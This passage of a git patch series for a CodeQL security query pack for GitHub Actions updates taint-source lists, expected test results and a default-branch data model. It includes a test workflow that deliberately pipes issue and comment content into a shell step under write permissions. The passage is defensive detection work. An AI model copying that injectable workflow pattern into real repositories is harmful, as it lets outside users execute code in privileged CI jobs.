From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 15:32:40 +0200 Subject: [PATCH 275/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index acfc1c7e2102..54748d6fd623 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.23 +version: 0.0.24 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index efafbbb55bac..1b8d7e64028c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.23 +version: 0.0.24 groups: - actions - queries From f96b9cc5356f5ffd29b7f94fb54fd59df2aafe93 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 15:35:13 +0200 Subject: [PATCH 276/707] Update tests --- ql/test/library-tests/test.expected | 1 + .../query-tests/Security/CWE-094/CodeInjection.expected | 7 +++++++ .../Security/CWE-094/PrivilegedCodeInjection.expected | 8 ++++++++ 3 files changed, 16 insertions(+) diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 61f7120e78e9..20db431fc24e 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -464,6 +464,7 @@ sources | jitterbit/get-changed-files | * | output.renamed | filename | manual | | khan/pull-request-comment-trigger | * | output.comment_body | text | manual | | marocchino/on_artifact | * | output.* | artifact | manual | +| peter-murray/issue-body-parser-action | * | output.* | text | manual | | puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | | redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | | tj-actions/branch-names | * | output.current_branch | branch | manual | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 9e479f9eaf49..cc716c47e698 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
@@ -59,6 +59,9 @@ edges | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | 
@@ -222,6 +225,10 @@ nodes | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | semmle.label | steps.changed.outputs.locale_files | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | semmle.label | Uses Step: changed2 | | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | semmle.label | steps.changed2.outputs.locale_files | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 738270e3ccd8..87658e4149eb 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -59,6 +59,9 @@ edges | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | 
@@ -222,6 +225,10 @@ nodes | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | semmle.label | steps.changed.outputs.locale_files | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | semmle.label | Uses Step: changed2 | | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | semmle.label | steps.changed2.outputs.locale_files | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -333,6 +340,7 @@ subpaths | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | From 30d0b9d1333120d31fc4a378b5f8c38428fac760 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 22:07:49 +0200 Subject: [PATCH 277/707] Add context paths containing tainted fields --- .../codeql/actions/dataflow/FlowSources.qll | 30 ++++++++----------- 1 file changed, 13 insertions(+), 17 deletions(-) 
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 9e4c258e39ab..08717c337875 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -76,22 +76,6 @@ private predicate textEvent(string context) { ) } -// bindingset[context] -// private predicate repoNameEvent(string context) { -// exists(string reg | -// reg = -// [ -// // repo name -// // Owner: All characters must be either a hyphen (-) or alphanumeric -// // Repo: All code points must be either a hyphen (-), an underscore (_), a period (.), or an ASCII alphanumeric code point -// "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", // repo name -// "github\\.event\\.workflow_run\\.head_repository\\.name", // repo name -// "github\\.event\\.workflow_run\\.head_repository\\.full_name", // nwo -// ] -// | -// Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) -// ) -// } bindingset[context] private predicate branchEvent(string context) { exists(string reg | 
@@ -194,7 +178,19 @@ private predicate jsonEvent(string context) { reg = [ // json - "github\\.event", + "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", + "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", + "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", + "github\\.event\\.inputs", "github\\.event\\.issue", "github\\.event\\.merge_group", + "github\\.event\\.merge_group\\.committer", "github\\.event\\.pull_request", + "github\\.event\\.pull_request\\.head", "github\\.event\\.pull_request\\.head\\.repo", + "github\\.event\\.pages", "github\\.event\\.review", "github\\.event\\.workflow", + "github\\.event\\.workflow_run", "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.workflow_run\\.head_commit", + "github\\.event\\.workflow_run\\.head_commit\\.author", + "github\\.event\\.workflow_run\\.head_commit\\.committer", + "github\\.event\\.workflow_run\\.head_repository", + "github\\.event\\.workflow_run\\.pull_requests", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) From 7a66b12437ec1870d915e2fd421131119fdbcacb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 22:33:50 +0200 Subject: [PATCH 278/707] add tests --- .../CWE-094/.github/workflows/test4.yml | 19 +++++++++++++++++++ .../Security/CWE-094/CodeInjection.expected | 2 ++ .../CWE-094/PrivilegedCodeInjection.expected | 4 ++++ 3 files changed, 25 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml new file mode 100644 index 000000000000..c4380bfa8afa --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml 
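Review bot: `github\\.event\\.workflow_run\\.head_branch` is, as far as I can tell, a scalar string in the workflow_run payload rather than an object, so listing it in jsonEvent classifies a branch-name source as JSON; if that is right it belongs with branchEvent (the predicate visible earlier in this file) and should be dropped from this list. The `// json` comment now heads a list of some two dozen paths without saying what qualifies an entry; I would replace it with `// Context objects containing at least one attacker-controlled field; dumping them (e.g. toJSON(github.event.comment)) propagates the taint` so reviewers know which additions belong here. Since each entry is passed through Utils::wrapRegexp, a one-line remark on whether the match is anchored to the exact path or also covers sub-paths would help too. The enclosing jsonEvent predicate starts before this hunk.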
@@ -0,0 +1,19 @@ +name: Test +on: + issue_comment: + types: [created, edited] + +permissions: + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Dump GitHub comment context + id: github_comment_step + run: echo '${{ toJSON(github.event.comment) }}' + + - name: Dump GitHub issue context + id: github_issue_step + run: echo '${{ toJSON(github.event.issue) }}' diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index cc716c47e698..34e173a055b5 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -229,6 +229,8 @@ nodes | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 87658e4149eb..4b2704043737 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
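Review bot: Both steps exercise paths that are on the new jsonEvent list, so this fixture only checks that the query reports them and cannot catch the list over-approximating. A third step dumping a context path that is deliberately not on the list, a `toJSON(...)` of a sub-object the list does not name, with no corresponding row in the .expected files, would pin the negative case as well. The `permissions: contents: write` block is what makes this a privileged-injection fixture; a one-line comment above it, `# write permission makes this job privileged`, would help whoever copies this file next.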
+++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -229,6 +229,8 @@ nodes | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -341,6 +343,8 @@ subpaths | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | 
From 6e8fc89034f9214461714c6401c277be95565483 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 09:29:24 +0000 Subject: [PATCH 279/707] Add default branch name check --- ql/lib/codeql/actions/dataflow/ExternalFlow.qll | 10 ++++++++-- .../dataflow/internal/ExternalFlowExtensions.qll | 6 +++++- .../actions/security/CachePoisoningQuery.qll | 15 ++++++++------- ql/lib/ext/workflow-models/workflow-models.yml | 6 ++++++ ql/test/library-tests/workflowenum.ql | 6 +++--- 5 files changed, 30 insertions(+), 13 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 5db10e7823ee..f10a90ee6ee2 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -3,10 +3,16 @@ private import codeql.actions.DataFlow private import actions predicate workflowDataModel( - string path, string visibility, string job, string secrets_source, string permissions, + string path, string trigger, string job, string secrets_source, string permissions, string runner ) { - Extensions::workflowDataModel(path, visibility, job, secrets_source, permissions, runner) + Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) +} + +predicate repositoryDataModel( + string visibility, string default_branch_name +) { + Extensions::repositoryDataModel(visibility, default_branch_name) } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 529f7721e71b..34f0297d7998 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll 
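Review bot: Renaming the second column of workflowDataModel from `visibility` to `trigger` changes what callers and data rows in that position mean, and this commit does not update them: SelfHostedQuery.qll still passes the literal `"public"` as that argument (corrected only in PATCH 288 further down), so until then it can only match rows whose trigger is the string "public". The new `repositoryDataModel` predicate, here and in the extensible declaration in ExternalFlowExtensions.qll (the next hunk), has no QLDoc while the predicate that follows it in this file does; I would add `/** Holds if the analysed repository has the given visibility (e.g. "public") and default_branch_name, as supplied by repositoryDataModel extension rows. */` above both. That comment should also say the predicate is empty unless an extension pack provides a row, since the shipped workflow-models.yml ends up with `data: []` later in this series.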
@@ -24,6 +24,10 @@ extensible predicate sinkModel( ); extensible predicate workflowDataModel( - string path, string visibility, string job, string secrets_source, string permissions, + string path, string trigger, string job, string secrets_source, string permissions, string runner ); + +extensible predicate repositoryDataModel( + string visibility, string default_branch_name +); diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index ab0f2d0809a7..df2e1db3bdd0 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -10,17 +10,18 @@ string defaultBranchTriggerEvent() { ] } -string defaultBranchNames() { result = ["main", "master", "default"] } - predicate runsOnDefaultBranch(Job j) { exists(Event e | j.getATriggerEvent() = e and + exists(string default_branch_name | + repositoryDataModel(_, default_branch_name) + ) and ( e.getName() = defaultBranchTriggerEvent() and not e.getName() = "pull_request_target" or e.getName() = "push" and - e.getAPropertyValue("branches") = defaultBranchNames() + e.getAPropertyValue("branches") = default_branch_name or e.getName() = "pull_request_target" and ( 
@@ -30,18 +31,18 @@ predicate runsOnDefaultBranch(Job j) { // only branches-ignore filter e.hasProperty("branches-ignore") and not e.hasProperty("branches") and - not e.getAPropertyValue("branches-ignore") = defaultBranchNames() + not e.getAPropertyValue("branches-ignore") = default_branch_name or // only branches filter e.hasProperty("branches") and not e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = defaultBranchNames() + e.getAPropertyValue("branches") = default_branch_name or // branches and branches-ignore filters e.hasProperty("branches") and e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = defaultBranchNames() and - not e.getAPropertyValue("branches-ignore") = defaultBranchNames() + e.getAPropertyValue("branches") = default_branch_name and + not e.getAPropertyValue("branches-ignore") = default_branch_name ) ) ) diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index f9f983be6937..ca4a46b25d05 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -1,4 +1,10 @@ extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: repositoryDataModel + data: [ + - ["public", "main"] + ] - addsTo: pack: githubsecuritylab/actions-all extensible: workflowDataModel diff --git a/ql/test/library-tests/workflowenum.ql b/ql/test/library-tests/workflowenum.ql index 692d1eb706bc..b3dc9185ec4c 100644 --- a/ql/test/library-tests/workflowenum.ql +++ b/ql/test/library-tests/workflowenum.ql 
@@ -2,7 +2,7 @@ import actions import codeql.actions.dataflow.internal.ExternalFlowExtensions as Extensions from - string path, string visibility, string job, string secrets_source, string permissions, + string path, string trigger, string job, string secrets_source, string permissions, string runner -where Extensions::workflowDataModel(path, visibility, job, secrets_source, permissions, runner) -select visibility, path, job, secrets_source, permissions, runner +where Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) +select trigger, path, job, secrets_source, permissions, runner From f38af29f80f24ece46242b1c29d26ccd3d3fce55 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 09:36:18 +0000 Subject: [PATCH 280/707] Fix array --- ql/lib/ext/workflow-models/workflow-models.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index ca4a46b25d05..2293080d93eb 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -2,9 +2,8 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all extensible: repositoryDataModel - data: [ + data: - ["public", "main"] - ] - addsTo: pack: githubsecuritylab/actions-all extensible: workflowDataModel From cae29e0abe34af10186565c751a4a3c5affb4dd4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 10:03:17 +0000 Subject: [PATCH 281/707] temporary fix --- ql/lib/codeql/actions/security/CachePoisoningQuery.qll | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index df2e1db3bdd0..b60eb7da7613 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll 
@@ -1,4 +1,5 @@ import actions +import codeql.actions.dataflow.ExternalFlow string defaultBranchTriggerEvent() { result = From a2503dd14b8bf028a6f28fb3c4bc6d9355441f7c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 10:22:40 +0000 Subject: [PATCH 282/707] fix default_branch_name visibility --- .../actions/security/CachePoisoningQuery.qll | 50 +++++++++---------- 1 file changed, 25 insertions(+), 25 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index b60eb7da7613..69590a4a0de3 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll 
@@ -15,35 +15,35 @@ predicate runsOnDefaultBranch(Job j) { exists(Event e | j.getATriggerEvent() = e and exists(string default_branch_name | - repositoryDataModel(_, default_branch_name) - ) and - ( - e.getName() = defaultBranchTriggerEvent() and - not e.getName() = "pull_request_target" - or - e.getName() = "push" and - e.getAPropertyValue("branches") = default_branch_name - or - e.getName() = "pull_request_target" and + repositoryDataModel(_, default_branch_name) and ( - // no filtering - not e.hasProperty("branches") and not e.hasProperty("branches-ignore") - or - // only branches-ignore filter - e.hasProperty("branches-ignore") and - not e.hasProperty("branches") and - not e.getAPropertyValue("branches-ignore") = default_branch_name + e.getName() = defaultBranchTriggerEvent() and + not e.getName() = "pull_request_target" or - // only branches filter - e.hasProperty("branches") and - not e.hasProperty("branches-ignore") and + e.getName() = "push" and e.getAPropertyValue("branches") = default_branch_name or - // branches and branches-ignore filters - e.hasProperty("branches") and - e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = default_branch_name and - not e.getAPropertyValue("branches-ignore") = default_branch_name + e.getName() = "pull_request_target" and + ( + // no filtering + not e.hasProperty("branches") and not e.hasProperty("branches-ignore") + or + // only branches-ignore filter + e.hasProperty("branches-ignore") and + not e.hasProperty("branches") and + not e.getAPropertyValue("branches-ignore") = default_branch_name + or + // only branches filter + e.hasProperty("branches") and + not e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = 